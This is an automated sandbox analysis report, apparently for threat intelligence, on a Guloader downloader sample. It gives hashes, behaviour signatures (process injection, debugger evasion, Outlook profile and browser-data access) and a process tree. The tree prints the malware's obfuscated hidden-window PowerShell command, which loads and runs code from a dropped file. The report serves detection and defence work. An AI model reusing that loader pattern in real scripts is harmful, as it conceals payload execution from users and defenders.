Analysis
- max time kernel: 145s
- max time network: 143s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 10/07/2024, 21:53
Static task
- static1
Behavioral task
- behavioral1: Sample 43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe, Resource win7-20240705-en
Behavioral task
- behavioral2: Sample 43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe, Resource win10v2004-20240709-en
General
- Target: 43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe
- Size: 407KB
- MD5: d0306eecb1329a6d25e3859eb094a246
- SHA1: 47f618e7478d4e14f7f072cd3bc7aa6b95310113
- SHA256: 43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5
- SHA512: f352abd59ab5f0f74c562aa663038474e2039b8a4b5b3121cdf2d082da778953720483849a92298f6ee46fb82d51232e4776eff817fbb58526b7c127581a04fc
- SSDEEP: 12288:vGjaO1u7KkTfCqYaU6n9MepLgHCV8kEm87W:vGb+KkTfCBaFn9dLgqlEm8C
Malware Config
Signatures
- Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell with a hidden display window.
  pid 2332, Process powershell.exe
- Loads dropped DLL (2 IoCs)
  pid 2332, Process powershell.exe
  pid 2840, Process Ancome.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Key opened \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (Process Ancome.exe)
  Key opened \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook (Process Ancome.exe)
  Key opened \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (Process Ancome.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 4: drive.google.com
  flow 5: drive.google.com
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  pid 2840, Process Ancome.exe (2 occurrences)
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid 2332, Process powershell.exe
  pid 2840, Process Ancome.exe
- Suspicious use of SetThreadContext (1 IoC)
  PID 2332 (powershell.exe) set thread context of PID 2840 (procid_target 34)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- NSIS installer (2 IoCs)
  resource behavioral1/files/0x000d000000012281-23.dat, yara_rule nsis_installer_1
  resource behavioral1/files/0x000d000000012281-23.dat, yara_rule nsis_installer_2
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid 2332, Process powershell.exe (8 occurrences)
- Suspicious behavior: MapViewOfSection (1 IoC)
  pid 2332, Process powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, pid 2332, Process powershell.exe
  Token: SeDebugPrivilege, pid 2840, Process Ancome.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  PID 2264 (43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe) wrote to memory of PID 2332 (procid_target 31), 4 events
  PID 2332 (powershell.exe) wrote to memory of PID 2840 (procid_target 34), 6 events
- outlook_office_path (1 IoC)
  Key opened \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (Process Ancome.exe)
- outlook_win_path (1 IoC)
  Key opened \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (Process Ancome.exe)
Processes
1. C:\Users\Admin\AppData\Local\Temp\43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\43322b3c55f80df1dfce965e2854e15025efe13436dbb117b9776b2a63ec4be5.exe"
   PID: 2264
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -windowstyle hidden "$Recontest=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Leptosomic26.Udt';$Genskabninger=$Recontest.SubString(51485,3);.$Genskabninger($Recontest)"
      PID: 2332
      - Command and Scripting Interpreter: PowerShell
      - Loads dropped DLL
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\AppData\Local\Temp\Ancome.exe
         Command line: "C:\Users\Admin\AppData\Local\Temp\Ancome.exe"
         PID: 2840
         - Loads dropped DLL
         - Accesses Microsoft Outlook profiles
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - Suspicious use of AdjustPrivilegeToken
         - outlook_office_path
         - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Downloads